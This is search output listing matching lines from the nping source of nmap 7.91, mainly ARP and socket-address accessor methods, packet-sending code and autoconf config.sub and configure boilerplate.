nmap-7.91+dfsg1/nping/NpingOps.cc:2106:} /* End of issetARPSenderHwAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2107-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2110- *  @return OP_SUCCESS on success and OP_FAILURE in case of error.           */
nmap-7.91+dfsg1/nping/NpingOps.cc:2111:int NpingOps::setARPTargetHwAddr(u8 * val){
nmap-7.91+dfsg1/nping/NpingOps.cc-2112-  memcpy(this->arp_tha, val, 6); /* MAC Address (6 bytes) */
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2114-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingOps.cc:2115:} /* End of setARPTargetHwAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2116-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2118-/** Returns value of attribute arp_tha */
nmap-7.91+dfsg1/nping/NpingOps.cc:2119:u8 * NpingOps::getARPTargetHwAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2120-  return this->arp_tha;
nmap-7.91+dfsg1/nping/NpingOps.cc:2121:} /* End of getARPTargetHwAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2122-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2124-/* Returns true if option has been set */
nmap-7.91+dfsg1/nping/NpingOps.cc:2125:bool NpingOps::issetARPTargetHwAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2126-  return this->arp_tha_set;
nmap-7.91+dfsg1/nping/NpingOps.cc:2127:} /* End of issetARPTargetHwAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2128-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2131- *  @return OP_SUCCESS on success and OP_FAILURE in case of error.           */
nmap-7.91+dfsg1/nping/NpingOps.cc:2132:int NpingOps::setARPSenderProtoAddr(struct in_addr val){
nmap-7.91+dfsg1/nping/NpingOps.cc-2133-  this->arp_spa=val;
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2135-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingOps.cc:2136:} /* End of setARPSenderProtoAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2137-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2139-/** Returns value of attribute arp_spa */
nmap-7.91+dfsg1/nping/NpingOps.cc:2140:struct in_addr NpingOps::getARPSenderProtoAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2141-  return this->arp_spa;
nmap-7.91+dfsg1/nping/NpingOps.cc:2142:} /* End of getARPSenderProtoAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2143-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2145-/* Returns true if option has been set */
nmap-7.91+dfsg1/nping/NpingOps.cc:2146:bool NpingOps::issetARPSenderProtoAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2147-  return this->arp_spa_set;
nmap-7.91+dfsg1/nping/NpingOps.cc:2148:} /* End of issetARPSenderProtoAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2149-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2152- *  @return OP_SUCCESS on success and OP_FAILURE in case of error.           */
nmap-7.91+dfsg1/nping/NpingOps.cc:2153:int NpingOps::setARPTargetProtoAddr(struct in_addr val){
nmap-7.91+dfsg1/nping/NpingOps.cc-2154-  this->arp_tpa=val;
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2156-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingOps.cc:2157:} /* End of setARPTargetProtoAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2158-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2160-/** Returns value of attribute arp_tpa */
nmap-7.91+dfsg1/nping/NpingOps.cc:2161:struct in_addr NpingOps::getARPTargetProtoAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2162-  return this->arp_tpa;
nmap-7.91+dfsg1/nping/NpingOps.cc:2163:} /* End of getARPTargetProtoAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2164-
##############################################
nmap-7.91+dfsg1/nping/NpingOps.cc-2166-/* Returns true if option has been set */
nmap-7.91+dfsg1/nping/NpingOps.cc:2167:bool NpingOps::issetARPTargetProtoAddr(){
nmap-7.91+dfsg1/nping/NpingOps.cc-2168-  return this->arp_tpa_set;
nmap-7.91+dfsg1/nping/NpingOps.cc:2169:} /* End of issetARPTargetProtoAddr() */
nmap-7.91+dfsg1/nping/NpingOps.cc-2170-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-174-     to the size of the sockaddr copied in. */
nmap-7.91+dfsg1/nping/NpingTarget.cc:175:int NpingTarget::getTargetSockAddr(struct sockaddr_storage *ss, size_t *ss_len) {
nmap-7.91+dfsg1/nping/NpingTarget.cc-176-  assert(ss);
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-184-
nmap-7.91+dfsg1/nping/NpingTarget.cc:185:} /* End of getTargetSockAddr() */
nmap-7.91+dfsg1/nping/NpingTarget.cc-186-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-189-     to sockaddr_storage */
nmap-7.91+dfsg1/nping/NpingTarget.cc:190:int NpingTarget::setTargetSockAddr(struct sockaddr_storage *ss, size_t ss_len) {
nmap-7.91+dfsg1/nping/NpingTarget.cc-191-  assert(ss_len > 0 && ss_len <= sizeof(*ss));
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-197-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingTarget.cc:198:} /* End of setTargetSockAddr() */
nmap-7.91+dfsg1/nping/NpingTarget.cc-199-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-250-/** Get source address used to reach the target.  */
nmap-7.91+dfsg1/nping/NpingTarget.cc:251:int NpingTarget::getSourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len) {
nmap-7.91+dfsg1/nping/NpingTarget.cc-252-  if (sourcesocklen <= 0)
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-259-  return 0;
nmap-7.91+dfsg1/nping/NpingTarget.cc:260:} /* End of getSourceSockAddr() */
nmap-7.91+dfsg1/nping/NpingTarget.cc-261-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-265-  * to sockaddr_storage */
nmap-7.91+dfsg1/nping/NpingTarget.cc:266:int NpingTarget::setSourceSockAddr(struct sockaddr_storage *ss, size_t ss_len) {
nmap-7.91+dfsg1/nping/NpingTarget.cc-267-  assert(ss_len > 0 && ss_len <= sizeof(*ss));
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-270-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingTarget.cc:271:} /* End of setSourceSockAddr() */
nmap-7.91+dfsg1/nping/NpingTarget.cc-272-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-276-  * to sockaddr_storage */
nmap-7.91+dfsg1/nping/NpingTarget.cc:277:int NpingTarget::setSpoofedSourceSockAddr(struct sockaddr_storage *ss, size_t ss_len) {
nmap-7.91+dfsg1/nping/NpingTarget.cc-278-  assert(ss_len > 0 && ss_len <= sizeof(*ss));
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-282-  return OP_SUCCESS;
nmap-7.91+dfsg1/nping/NpingTarget.cc:283:} /* End of setSpoofedSourceSockAddr() */
nmap-7.91+dfsg1/nping/NpingTarget.cc-284-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-286-/** Get source address used to reach the target.  */
nmap-7.91+dfsg1/nping/NpingTarget.cc:287:int NpingTarget::getSpoofedSourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len) {
nmap-7.91+dfsg1/nping/NpingTarget.cc-288-  if (spoofedsrcsocklen <= 0)
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-295-  return 0;
nmap-7.91+dfsg1/nping/NpingTarget.cc:296:} /* End of getSpoofedSourceSockAddr() */
nmap-7.91+dfsg1/nping/NpingTarget.cc-297-
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-757-  if (this->isDirectlyConnected()) {
nmap-7.91+dfsg1/nping/NpingTarget.cc:758:    this->getTargetSockAddr(&targetss, &sslen);
nmap-7.91+dfsg1/nping/NpingTarget.cc-759-  } else {
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-789-    nping_print(DBG_3,"    > Sending ARP request using spoofed IP %s...", this->getSpoofedSourceIPStr() );
nmap-7.91+dfsg1/nping/NpingTarget.cc:790:      this->getSpoofedSourceSockAddr(&srcss, NULL);
nmap-7.91+dfsg1/nping/NpingTarget.cc-791-      if (doArp(this->getDeviceName(), this->getSrcMACAddress(), &srcss, &targetss, mac, NULL)) {
##############################################
nmap-7.91+dfsg1/nping/NpingTarget.cc-801-  nping_print(DBG_4,"    > Sending ARP request using our real IP %s...", this->getSourceIPStr() );
nmap-7.91+dfsg1/nping/NpingTarget.cc:802:  this->getSourceSockAddr(&srcss, NULL);
nmap-7.91+dfsg1/nping/NpingTarget.cc-803-  if (doArp(this->getDeviceName(), this->getSrcMACAddress(), &srcss, &targetss, mac, NULL)) {
##############################################
nmap-7.91+dfsg1/nping/config.sub-52-
nmap-7.91+dfsg1/nping/config.sub:53:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/nping/config.sub-54-
##############################################
nmap-7.91+dfsg1/nping/config.sub-115-# Here we must recognize all the valid KERNEL-OS combinations.
nmap-7.91+dfsg1/nping/config.sub:116:maybe_os=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\2/'`
nmap-7.91+dfsg1/nping/config.sub-117-case $maybe_os in
##############################################
nmap-7.91+dfsg1/nping/config.sub-123-    os=-$maybe_os
nmap-7.91+dfsg1/nping/config.sub:124:    basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`
nmap-7.91+dfsg1/nping/config.sub-125-    ;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-127-    os=-linux-android
nmap-7.91+dfsg1/nping/config.sub:128:    basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`-unknown
nmap-7.91+dfsg1/nping/config.sub-129-    ;;
nmap-7.91+dfsg1/nping/config.sub-130-  *)
nmap-7.91+dfsg1/nping/config.sub:131:    basic_machine=`echo $1 | sed 's/-[^-]*$//'`
nmap-7.91+dfsg1/nping/config.sub-132-    if [ $basic_machine != $1 ]
nmap-7.91+dfsg1/nping/config.sub:133:    then os=`echo $1 | sed 's/.*-/-/'`
nmap-7.91+dfsg1/nping/config.sub-134-    else os=; fi
##############################################
nmap-7.91+dfsg1/nping/config.sub-181-		os=-sco5v6
nmap-7.91+dfsg1/nping/config.sub:182:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-183-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-185-		os=-sco3.2v5
nmap-7.91+dfsg1/nping/config.sub:186:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-187-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-189-		os=-sco3.2v4
nmap-7.91+dfsg1/nping/config.sub:190:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-191-		;;
nmap-7.91+dfsg1/nping/config.sub-192-	-sco3.2.[4-9]*)
nmap-7.91+dfsg1/nping/config.sub:193:		os=`echo $os | sed -e 's/sco3.2./sco3.2v/'`
nmap-7.91+dfsg1/nping/config.sub:194:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-195-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-197-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/nping/config.sub:198:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-199-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-201-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/nping/config.sub:202:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-203-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-205-		os=-sco3.2v2
nmap-7.91+dfsg1/nping/config.sub:206:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-207-		;;
nmap-7.91+dfsg1/nping/config.sub-208-	-udk*)
nmap-7.91+dfsg1/nping/config.sub:209:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-210-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-212-		os=-isc2.2
nmap-7.91+dfsg1/nping/config.sub:213:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-214-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-218-	-isc*)
nmap-7.91+dfsg1/nping/config.sub:219:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-220-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-230-	-ptx*)
nmap-7.91+dfsg1/nping/config.sub:231:		basic_machine=`echo $1 | sed -e 's/86-.*/86-sequent/'`
nmap-7.91+dfsg1/nping/config.sub-232-		;;
nmap-7.91+dfsg1/nping/config.sub-233-	-windowsnt*)
nmap-7.91+dfsg1/nping/config.sub:234:		os=`echo $os | sed -e 's/windowsnt/winnt/'`
nmap-7.91+dfsg1/nping/config.sub-235-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-366-	*-*-*)
nmap-7.91+dfsg1/nping/config.sub:367:		echo Invalid configuration \`$1\': machine \`$basic_machine\' not recognized 1>&2
nmap-7.91+dfsg1/nping/config.sub-368-		exit 1
##############################################
nmap-7.91+dfsg1/nping/config.sub-491-	amd64-*)
nmap-7.91+dfsg1/nping/config.sub:492:		basic_machine=x86_64-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-493-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-533-	blackfin-*)
nmap-7.91+dfsg1/nping/config.sub:534:		basic_machine=bfin-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-535-		os=-linux
##############################################
nmap-7.91+dfsg1/nping/config.sub-541-	c54x-*)
nmap-7.91+dfsg1/nping/config.sub:542:		basic_machine=tic54x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-543-		;;
nmap-7.91+dfsg1/nping/config.sub-544-	c55x-*)
nmap-7.91+dfsg1/nping/config.sub:545:		basic_machine=tic55x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-546-		;;
nmap-7.91+dfsg1/nping/config.sub-547-	c6x-*)
nmap-7.91+dfsg1/nping/config.sub:548:		basic_machine=tic6x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-549-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-744-	i*86v32)
nmap-7.91+dfsg1/nping/config.sub:745:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-746-		os=-sysv32
##############################################
nmap-7.91+dfsg1/nping/config.sub-748-	i*86v4*)
nmap-7.91+dfsg1/nping/config.sub:749:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-750-		os=-sysv4
##############################################
nmap-7.91+dfsg1/nping/config.sub-752-	i*86v)
nmap-7.91+dfsg1/nping/config.sub:753:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-754-		os=-sysv
##############################################
nmap-7.91+dfsg1/nping/config.sub-756-	i*86sol2)
nmap-7.91+dfsg1/nping/config.sub:757:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/nping/config.sub-758-		os=-solaris2
##############################################
nmap-7.91+dfsg1/nping/config.sub-782-	leon-*|leon[3-9]-*)
nmap-7.91+dfsg1/nping/config.sub:783:		basic_machine=sparc-`echo $basic_machine | sed 's/-.*//'`
nmap-7.91+dfsg1/nping/config.sub-784-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-789-	m68knommu-*)
nmap-7.91+dfsg1/nping/config.sub:790:		basic_machine=m68k-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-791-		os=-linux
##############################################
nmap-7.91+dfsg1/nping/config.sub-826-	mips3*-*)
nmap-7.91+dfsg1/nping/config.sub:827:		basic_machine=`echo $basic_machine | sed -e 's/mips3/mips64/'`
nmap-7.91+dfsg1/nping/config.sub-828-		;;
nmap-7.91+dfsg1/nping/config.sub-829-	mips3*)
nmap-7.91+dfsg1/nping/config.sub:830:		basic_machine=`echo $basic_machine | sed -e 's/mips3/mips64/'`-unknown
nmap-7.91+dfsg1/nping/config.sub-831-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-848-	ms1-*)
nmap-7.91+dfsg1/nping/config.sub:849:		basic_machine=`echo $basic_machine | sed -e 's/ms1-/mt-/'`
nmap-7.91+dfsg1/nping/config.sub-850-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-967-	parisc-*)
nmap-7.91+dfsg1/nping/config.sub:968:		basic_machine=hppa-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-969-		os=-linux
##############################################
nmap-7.91+dfsg1/nping/config.sub-983-	pc98-*)
nmap-7.91+dfsg1/nping/config.sub:984:		basic_machine=i386-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-985-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-998-	pentium-* | p5-* | k5-* | k6-* | nexgen-* | viac3-*)
nmap-7.91+dfsg1/nping/config.sub:999:		basic_machine=i586-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1000-		;;
nmap-7.91+dfsg1/nping/config.sub-1001-	pentiumpro-* | p6-* | 6x86-* | athlon-*)
nmap-7.91+dfsg1/nping/config.sub:1002:		basic_machine=i686-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1003-		;;
nmap-7.91+dfsg1/nping/config.sub-1004-	pentiumii-* | pentium2-* | pentiumiii-* | pentium3-*)
nmap-7.91+dfsg1/nping/config.sub:1005:		basic_machine=i686-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1006-		;;
nmap-7.91+dfsg1/nping/config.sub-1007-	pentium4-*)
nmap-7.91+dfsg1/nping/config.sub:1008:		basic_machine=i786-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1009-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1017-	ppc-* | ppcbe-*)
nmap-7.91+dfsg1/nping/config.sub:1018:		basic_machine=powerpc-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1019-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1023-	ppcle-* | powerpclittle-*)
nmap-7.91+dfsg1/nping/config.sub:1024:		basic_machine=powerpcle-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1025-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1027-		;;
nmap-7.91+dfsg1/nping/config.sub:1028:	ppc64-*) basic_machine=powerpc64-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1029-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1033-	ppc64le-* | powerpc64little-*)
nmap-7.91+dfsg1/nping/config.sub:1034:		basic_machine=powerpc64le-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1035-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1116-	strongarm-* | thumb-*)
nmap-7.91+dfsg1/nping/config.sub:1117:		basic_machine=arm-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub-1118-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1246-	xscale-* | xscalee[bl]-*)
nmap-7.91+dfsg1/nping/config.sub:1247:		basic_machine=`echo $basic_machine | sed 's/^xscale/arm/'`
nmap-7.91+dfsg1/nping/config.sub-1248-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1323-	*)
nmap-7.91+dfsg1/nping/config.sub:1324:		echo Invalid configuration \`$1\': machine \`$basic_machine\' not recognized 1>&2
nmap-7.91+dfsg1/nping/config.sub-1325-		exit 1
##############################################
nmap-7.91+dfsg1/nping/config.sub-1331-	*-digital*)
nmap-7.91+dfsg1/nping/config.sub:1332:		basic_machine=`echo $basic_machine | sed 's/digital.*/dec/'`
nmap-7.91+dfsg1/nping/config.sub-1333-		;;
nmap-7.91+dfsg1/nping/config.sub-1334-	*-commodore*)
nmap-7.91+dfsg1/nping/config.sub:1335:		basic_machine=`echo $basic_machine | sed 's/commodore.*/cbm/'`
nmap-7.91+dfsg1/nping/config.sub-1336-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1352-	-solaris1 | -solaris1.*)
nmap-7.91+dfsg1/nping/config.sub:1353:		os=`echo $os | sed -e 's|solaris1|sunos4|'`
nmap-7.91+dfsg1/nping/config.sub-1354-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1364-	-gnu/linux*)
nmap-7.91+dfsg1/nping/config.sub:1365:		os=`echo $os | sed -e 's|gnu/linux|linux-gnu|'`
nmap-7.91+dfsg1/nping/config.sub-1366-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1410-	-nto*)
nmap-7.91+dfsg1/nping/config.sub:1411:		os=`echo $os | sed -e 's|nto|nto-qnx|'`
nmap-7.91+dfsg1/nping/config.sub-1412-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1417-	-mac*)
nmap-7.91+dfsg1/nping/config.sub:1418:		os=`echo $os | sed -e 's|mac|macos|'`
nmap-7.91+dfsg1/nping/config.sub-1419-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1423-	-linux*)
nmap-7.91+dfsg1/nping/config.sub:1424:		os=`echo $os | sed -e 's|linux|linux-gnu|'`
nmap-7.91+dfsg1/nping/config.sub-1425-		;;
nmap-7.91+dfsg1/nping/config.sub-1426-	-sunos5*)
nmap-7.91+dfsg1/nping/config.sub:1427:		os=`echo $os | sed -e 's|sunos5|solaris2|'`
nmap-7.91+dfsg1/nping/config.sub-1428-		;;
nmap-7.91+dfsg1/nping/config.sub-1429-	-sunos6*)
nmap-7.91+dfsg1/nping/config.sub:1430:		os=`echo $os | sed -e 's|sunos6|solaris3|'`
nmap-7.91+dfsg1/nping/config.sub-1431-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1478-	-sinix5.*)
nmap-7.91+dfsg1/nping/config.sub:1479:		os=`echo $os | sed -e 's|sinix|sysv|'`
nmap-7.91+dfsg1/nping/config.sub-1480-		;;
##############################################
nmap-7.91+dfsg1/nping/config.sub-1531-		# Get rid of the `-' at the beginning of $os.
nmap-7.91+dfsg1/nping/config.sub:1532:		os=`echo $os | sed 's/[^-]*-//'`
nmap-7.91+dfsg1/nping/config.sub:1533:		echo Invalid configuration \`$1\': system \`$os\' not recognized 1>&2
nmap-7.91+dfsg1/nping/config.sub-1534-		exit 1
##############################################
nmap-7.91+dfsg1/nping/config.sub-1794-		esac
nmap-7.91+dfsg1/nping/config.sub:1795:		basic_machine=`echo $basic_machine | sed "s/unknown/$vendor/"`
nmap-7.91+dfsg1/nping/config.sub-1796-		;;
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1206-    /* Sender HW Address */
nmap-7.91+dfsg1/nping/ProbeMode.cc:1207:    if( o.issetARPSenderHwAddr() )
nmap-7.91+dfsg1/nping/ProbeMode.cc:1208:        a.setSenderMAC( o.getARPSenderHwAddr() );
nmap-7.91+dfsg1/nping/ProbeMode.cc-1209-    else
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1212-    /* Sender Protocol Address */
nmap-7.91+dfsg1/nping/ProbeMode.cc:1213:    if( o.issetARPSenderProtoAddr() )
nmap-7.91+dfsg1/nping/ProbeMode.cc:1214:        a.setSenderIP( o.getARPSenderProtoAddr() );
nmap-7.91+dfsg1/nping/ProbeMode.cc-1215-    else if ( o.issetIPv4SourceAddress() )
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1220-    /* Target HW Address */
nmap-7.91+dfsg1/nping/ProbeMode.cc:1221:    if( o.issetARPTargetProtoAddr() )
nmap-7.91+dfsg1/nping/ProbeMode.cc:1222:        a.setTargetIP( o.getARPTargetProtoAddr() );
nmap-7.91+dfsg1/nping/ProbeMode.cc-1223-    else
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1226-    /* Target Protocol Address */
nmap-7.91+dfsg1/nping/ProbeMode.cc:1227:    if( o.issetARPTargetHwAddr() )
nmap-7.91+dfsg1/nping/ProbeMode.cc:1228:        a.setTargetMAC( o.getARPTargetHwAddr() );
nmap-7.91+dfsg1/nping/ProbeMode.cc-1229-    else
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1295-  if( o.spoofSource() )
nmap-7.91+dfsg1/nping/ProbeMode.cc:1296:    memcpy( &srcss, o.getSourceSockAddr(), sizeof(struct sockaddr_storage) );
nmap-7.91+dfsg1/nping/ProbeMode.cc-1297-  else  if( (t=o.targets.getNextTarget())!= NULL ){
nmap-7.91+dfsg1/nping/ProbeMode.cc:1298:    t->getSourceSockAddr(&srcss, &srclen);
nmap-7.91+dfsg1/nping/ProbeMode.cc-1299-  }else{
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1314-  if(t!=NULL)
nmap-7.91+dfsg1/nping/ProbeMode.cc:1315:    t->getTargetSockAddr(&dstss, &dstlen);
nmap-7.91+dfsg1/nping/ProbeMode.cc-1316-
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1607-                    struct sockaddr_storage ss_dst;
nmap-7.91+dfsg1/nping/ProbeMode.cc:1608:                    mypacket->target->getSourceSockAddr(&ss_src, &sslen);
nmap-7.91+dfsg1/nping/ProbeMode.cc:1609:                    mypacket->target->getTargetSockAddr(&ss_dst, &sslen);
nmap-7.91+dfsg1/nping/ProbeMode.cc-1610-                    getPacketStrInfo("IPv6_NO_HEADER", mypacket->pkt, mypacket->pktLen, pktinfobuffer, 512, &ss_src, &ss_dst );
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-1958-        struct sockaddr_storage ss;
nmap-7.91+dfsg1/nping/ProbeMode.cc:1959:        nsock_iod_set_localaddr(fds[packetno%max_iods], o.getSourceSockAddr(&ss), sizeof(sockaddr_storage));
nmap-7.91+dfsg1/nping/ProbeMode.cc-1960-        /*Set socket options for REUSEADDR*/
##############################################
nmap-7.91+dfsg1/nping/ProbeMode.cc-2167-        struct sockaddr_storage ss;
nmap-7.91+dfsg1/nping/ProbeMode.cc:2168:        nsock_iod_set_localaddr(fds[packetno%max_iods], o.getSourceSockAddr(&ss), sizeof(sockaddr_storage));
nmap-7.91+dfsg1/nping/ProbeMode.cc-2169-
##############################################
nmap-7.91+dfsg1/nping/common_modified.cc-743-
nmap-7.91+dfsg1/nping/common_modified.cc:744:/* IPv6 compatible version of Nmap's devname2ipaddr()
nmap-7.91+dfsg1/nping/common_modified.cc-745- * @warning For this to work we need getinterfaces() not to skip IPv6 */
##############################################
nmap-7.91+dfsg1/nping/common_modified.cc-757-if( !addr || !dev )
nmap-7.91+dfsg1/nping/common_modified.cc:758:    fatal("devname2ipaddr(): NULL values supplied.");
nmap-7.91+dfsg1/nping/common_modified.cc-759-
##############################################
nmap-7.91+dfsg1/nping/common_modified.cc-774-
nmap-7.91+dfsg1/nping/common_modified.cc:775:} /* End of devname2ipaddr() */
nmap-7.91+dfsg1/nping/common_modified.cc-776-
##############################################
nmap-7.91+dfsg1/nping/configure-43-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/nping/configure:44:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nping/configure-45-  as_echo='print -r --'
nmap-7.91+dfsg1/nping/configure-46-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/nping/configure:47:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nping/configure-48-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/nping/configure-50-else
nmap-7.91+dfsg1/nping/configure:51:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/nping/configure-52-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/nping/configure-60-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/nping/configure:61:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/nping/configure-62-      esac;
##############################################
nmap-7.91+dfsg1/nping/configure-197-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
